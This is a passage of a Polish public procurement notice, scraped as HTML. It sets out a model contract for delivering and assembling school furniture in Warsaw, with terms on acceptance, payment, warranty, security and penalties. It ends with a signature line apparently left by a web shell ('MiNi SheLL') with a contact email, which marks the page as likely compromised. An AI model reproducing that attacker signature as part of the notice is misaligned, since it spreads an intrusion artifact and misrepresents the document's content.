niż w 2016 roku), nieużywane, kompletne isprawne technicznie, a także będą spełniać wszystkie wymogi techniczno-jakościoweokreślone w przepisach prawa, w tym normy bezpieczeństwa. § 2 Termin wykonaniaumowy. 1. Wykonawca zobowiązuje się wykonać przedmiot umowy do dnia 16 sierpnia 2017 roku. 2. Przez wykonanie przedmiot umowy Strony rozumieją dostawę mebli na zasadachokreślonych w § 1 niniejszej umowy. 3. Wykonawca jest zobowiązany uzgodnić zZamawiającym termin planowanej dostawy mebli. 4. Dostawa może następować wczęściach na zasadach uzgodnionych z Zamawiającym, jednak podpisanie protokołuodbioru mebli winno nastąpić po zakończeniu dostawy wszystkich mebli na zasadachokreślonych w § 3 niniejszej umowy. 5. Wykonawca zobowiązany jest do rozpoczęciamontażu i ustawienia mebli niezwłocznie po wniesieniu ich do budynku. 6. Wykonawcazobowiązuje się, że wniesienie mebli do budynku Szkoły, montaż i ustawienie naposzczególnych piętrach i w pomieszczeniach Szkoły. 7. Wykonawca odpowiada za wszelkiszkody na mieniu i osobach powstałe w związku z dostawą mebli, w tym wynikłe przywnoszeniu mebli czy ich montażu. § 3 Protokół odbioru 1. Potwierdzeniem wykonaniaprzedmiotu umowy i podstawą do zapłaty wynagrodzenia będzie podpisany przez Stronybez uwag protokół odbioru mebli, którego wzór stanowi Załącznik nr 2 do umowy. 2.Strony przystąpią do podpisania protokołu odbioru mebli umowy niezwłocznie pozakończeniu montażu i ustawienia wszystkich mebli, będących przedmiotem umowy.Zamawiający zobowiązany jest do stawiennictwa do odbioru w ciągu 3 godzin zegarowychod zgłoszenia przez Wykonawcę gotowości do odbioru. 3. Jeżeli pod dokonaniu montażu iustawieniu mebli okaże się, że nie więcej niż 10 sztuk mebli będzie posiadało drobne wady,które nie uniemożliwiają ich użytkowania, Strony będą uprawnione do podpisania protokołuodbioru mebli ze stosownymi uwagami, a Wykonawca zobowiązany będzie do wymianytych mebli na meble bez wad albo do obniżenia ceny jednostkowej wadliwych mebli o 50 %w stosunku do ceny zawartej w Załączniku nr 3 do umowy - w terminie 7 dni od podpisaniaprotokołu z uwagami. Zadośćuczynienie w/w zobowiązaniom przez Wykonawcę uprawniaStrony do podpisania protokołu odbioru mebli bez uwag. 4. W innych przypadkach niż określone w ust. 3 niniejszego paragrafu, w tym: a) niezgodności dostarczonych mebli zprzedmiotem zamówienia, b) gdy opóźnienie Wykonawcy w wykonaniu przedmiotuumowy, w tym niedostarczenie wszystkich mebli - w terminie określonym w § 2 ust.1przekroczy 7 dni, Zamawiający będzie uprawniony odmówić podpisania protokołu odbioruoraz odstąpić od umowy ze skutkiem natychmiastowym, bez wyznaczania dodatkowegoterminu. 5. Z chwilą podpisania protokołu na Zamawiającego przechodzi własność mebli, wtym ryzyko utraty, zniszczenia, czy kradzieży mebli. 6. Do protokołu odbioru Wykonawcadołączy następujące dokumenty w języku polskim: a) atest higieniczny dla płyty wiórowejlaminowanej, HDF, postforming, b) deklarację wodoodporności blatu postforming. 7.Niewykonanie zobowiązania określonego w ust. 6 niniejszego paragrafu upoważniaZamawiającego do niepodpisania protokołu odbioru mebli. 8. Osobą upoważnioną dopodpisania protokołu odbioru mebli ze strony Zamawiającego jest Pani ..................... aze strony Wykonawcy Pan ..................., co nie wyłącza prawa podpisania protokołuprzez same Strony umowy. Zmiana osób nie powoduje zmiany niniejszej umowy i możenastąpić w drodze powiadomienia. § 4 Wynagrodzenie 1. Za wykonanie przedmiotu umowyokreślonego w § 1 Zamawiający zapłaci Wykonawcy wynagrodzenie ryczałtowe wwysokości ........................ brutto (słownie złotych brutto:............................................. ). 2. Kwota określona w ust. 1 obejmuje zapłatę zawykonanie wszystkich zobowiązań wynikających z umowy, w tym wynagrodzenie zaprzeniesienie własności mebli na Zamawiającego oraz wszystkie koszty związane zrealizacją transportu, wniesienia, montażu i ustawienia. 3. Podstawę do zapłaty stanowićbędzie wystawiona przez Wykonawcę faktura VAT, z załączonym protokołem odbiorupodpisanym bez uwag. 4. Fakturę należy wystawić na : Miasto Stołeczne Warszawa, Pl.Bankowy 3/5, 00-950 Warszawa, NIP 525-22-48-481 Odbiorca/Płatnik: Zespołu SzkółSportowych nr 50 im. Janusza Kusocińskiego, ul. Samuela Bogumiła Lindego 20, 01-952Warszawa 5. Ceny jednostkowe poszczególnych mebli zawiera Załącznik nr 3 do niniejszejumowy. 6. Należności Wykonawcy z tytułu realizacji umowy płatne będą po dostawiewszystkich mebli, z zastrzeżeniem § 3 ust. 3 niniejszej umowy, przelewem na rachunekbankowy Wykonawcy wskazany w fakturze VAT, w ciągu 14 dni od dostarczeniaZamawiającemu prawidłowo wystawionej faktury VAT. 7. Za datę zapłaty strony uznajądatę złożenia przez Zamawiającego polecenia przelewu bankowego. § 5 Gwarancja 1.Wykonawca udziela Zamawiającemu gwarancji na meble wynoszącej 2 lata od dnia podpisania protokołu odbioru mebli bez uwag. Dodatkowo gwarancja ma obejmowaćwszelkie uszkodzenia okuć meblowych ( zwłaszcza mechaniczne ) powstałe przyeksploatacji mebla przez cały okres obowiązywania gwarancji. 2. W ramach gwarancjiWykonawca przystępuje do naprawy lub wymiany wadliwych mebli w okresie niedłuższym niż 7 dni roboczych od momentu zgłoszenia. 3. Zgłoszenia, o którym mowa wust. 2 niniejszego paragrafu dokonuje się listem poleconym na adres Wykonawcy wskazanyw niniejszej umowie lub na adres poczty elektronicznej: ........................ podwarunkiem otrzymania przez Zamawiającego od Wykonawcy potwierdzenia dostarczeniazgłoszenia w formie elektronicznej. 4. Jeżeli naprawa lub wymiana wadliwych mebli niezostanie dokonana w ciągu 14 dni roboczych od momentu zgłoszenia, Zamawiający maprawo żądać zapłaty kary umownej w wysokości 50 % ceny jednostkowej tych mebli z datydostawy, wskazanej w Załączniku nr 3 do niniejszej umowy. 5. Obowiązki gwarancyjnebędą świadczone w siedzibie Zamawiającego, chyba że z przyczyn technicznym będzie toniemożliwe. Koszty transportu pokrywa Wykonawca. 6. Niezależnie od zakresu gwarancji,Wykonawca udziela Zamawiającemu rękojmi na meble na zasadach określonych wKodeksie cywilnym, z zastrzeżeniem, że okres rękojmi biegnie od podpisania protokołuodbioru mebli bez uwag. § 6 Zabezpieczenie należytego wykonania umowy 1. Stronyustalają zabezpieczenie należytego wykonania niniejszej umowy, zwane dalej,,zabezpieczeniem", stanowiące 5 % ceny całkowitej podanej w ofercie, określonej w § 4ust. 1 niniejszej umowy, tj. ............... złotych brutto (słownie: ....................... ) 2.Zamawiający 70 % zabezpieczenia należytego wykonania umowy zwróci lub zwolni wciągu 30 dni od dnia podpisania protokołu odbioru mebli bez uwag. 3. Na zabezpieczenieroszczeń z tytułu rękojmi za wady mebli pozostanie kwota w wysokości 30 %zabezpieczenia ustalonego w ust. 1 niniejszego paragrafu. 4. Kwota, o której mowa w ust. 3,zostanie zwrócona Wykonawcy nie później niż w 15 dniu po upływie okresu rękojmi zawady. 5. Zabezpieczenie należytego wykonania umowy w pieniądzu Zamawiający zwróciWykonawcy z odsetkami wynikającymi z umowy rachunku bankowego, na którym byłoono przechowywane, pomniejszone o koszt prowadzenia rachunku oraz prowizji za przelewpieniędzy na rachunek Wykonawcy. § 7 Kary umowne 1. W razie niewykonania lubnienależytego wykonania umowy Wykonawca zobowiązany jest zapłacić kary umowne: a)w wysokości 1 % wynagrodzenia określonego w § 4 ust. 1 za każdy dzień opóźnienia wdostawie mebli, b) w wysokości 20 % wynagrodzenia określonego w § 4 ust. 1 w przypadku odstąpienia przez Zamawiającego od umowy z powodu okoliczności, za któreodpowiedzialność ponosi Wykonawca, c) szkód w budynku powstałych z winy Wykonawcyprzy wnoszeniu, montażu lub ustawieniu mebli - 3 % wynagrodzenia określonego w § 4ust. 1. 2. Wykonawca wyraża zgodę na dokonanie potrącenia naliczonych kar umownych dopełnej wysokości z przysługującemu mu wynagrodzenia. 3. Zamawiającemu, niezależnie odkar umownych, z tytułu niewykonania lub nienależytego wykonania umowy przezWykonawcę, przysługuje prawo dochodzenia odszkodowania przewyższającego wysokośćzastrzeżonych kar umownych. 4. Kary umowne stają się wymagalne z chwilą zaistnieniaokoliczności do ich naliczenia. 5. Kary określone w ust. 1 a), b) i c) niniejszego paragrafusumują się, przy czym maksymalna wartość naliczonych kar nie może wynieść więcej niż30 % wynagrodzenia określonego w § 4 ust. 1. § 8 Informacja publiczna 1. Wykonawcaoświadcza, że znany jest mu fakt, że treść niniejszej umowy, a w szczególności przedmiotumowy i wysokość wynagrodzenia, stanowią informację publiczną w rozumieniu art. 1ust.1 ustawy z dnia 6 września 2001r. o dostępie do informacji publicznej (Dz. U. z 2015 r.poz. 2058, z późn. zm.), która podlega udostępnieniu w trybie przedmiotowej ustawy, zzastrzeżeniem ust. 2. 2. Wykonawca wyraża zgodę na udostępnianie w trybie ustawy, októrej mowa w ust. 1, zawartych w niniejszej umowie dotyczących danych osobowych wzakresie obejmującym imię i nazwisko, a w przypadku prowadzenia działalnościgospodarczej również w zakresie firmy. § 9 Postanowienia końcowe 1. Zamawiającywskazuje następującą osobę upoważnioną do koordynacji wykonania niniejszej umowy zestrony Zamawiającego: .................................... (mail:................................................. , tel. .......................................... 2.Wykonawca wskazuje następującą osobę upoważnioną do koordynacji wykonania niniejszejumowy ze strony Wykonawcy: Pan ............................ (mail: ........................, tel...........................) 3. Zmiana osób lub danych kontaktowych osób wskazanych w ust. 1 i2 niniejszego paragrafu nie powoduje zmiany niniejszej umowy i może nastąpić w drodzepowiadomienia. 4. Każda zmiana postanowień niniejszej umowy wymaga formy pisemnejw postaci aneksu pod rygorem nieważności. 5. W sprawach nieuregulowanych niniejsząumową mają zastosowanie przepisy Kodeksu Cywilnego. Spory mogące wyniknąć wzwiązku z realizacją umowy, strony poddają rozstrzygnięciu właściwego dla siedzibyZamawiającego sądu powszechnego. 6. Umowa niniejsza sporządzona zostaje w dwóchjednobrzmiących egzemplarzach, po jednym dla każdej ze Stron. </span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający będzie żądać od Wykonawcy zabezpieczenia należytego wykonania umowyw wysokości 5% ceny całkowitej określonej w §4 ust.1 wzoru umowy zamieszczonego wsekcji IV - pkt 4) Ogłoszenia (stanowiącego załącznik nr 2 do Ogłoszenia). 1.Przedzawarciem umowy - Wykonawca zobowiązany jest wnieść zabezpieczenie należytegowykonania umowy. Termin na jaki ma być wniesione zabezpieczenie, wynika ze wzoruumowy. 2. Za dzień wniesienia zabezpieczenia uznaje się dzień wpłynięcia zabezpieczeniana rachunek banku Zamawiającego lub dzień złożeia zabezpieczenia w siedzibieZamawiającego, w przypadku wniesienia go w formie określonej odpowiednio wponiższym ust.3 - lit.b)-e). 3. Zabezpieczenie należytego wykonania umowy może byćwnoszone według wybory Wykonawcy w jednej lub kilku z następujących form: a) wpieniądzu, b)w poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniempieniężnym, c)w gwarancjach bankowych, d)w gwarancjach ubezpieczeniowych, e)wporęczeniach udzielanych przez podmioty o których mowa w art. 6b ust.5 pkt 2 ustawy zdnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 4.Wprzypadkach wniesienia zabezpieczenia należytego wykonania umowy w formie określonejodpowiednio w powyższym zapisie ust.3. lit. b)-e), muszą być one bezwarunkowe,nieodwołalne i płatne na każde żądanie. 5. Pozostałe wymagania/informacje dotyczącezabezpieczenia należytego wykonania umowy zamieszczone zostały w §6 wzoru umowyzamieszczonego w sekcji IV - pkt 4) Ogłoszenia (stanowiącego załącznik nr 2 doOgłoszenia).</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data"></span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina"></span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com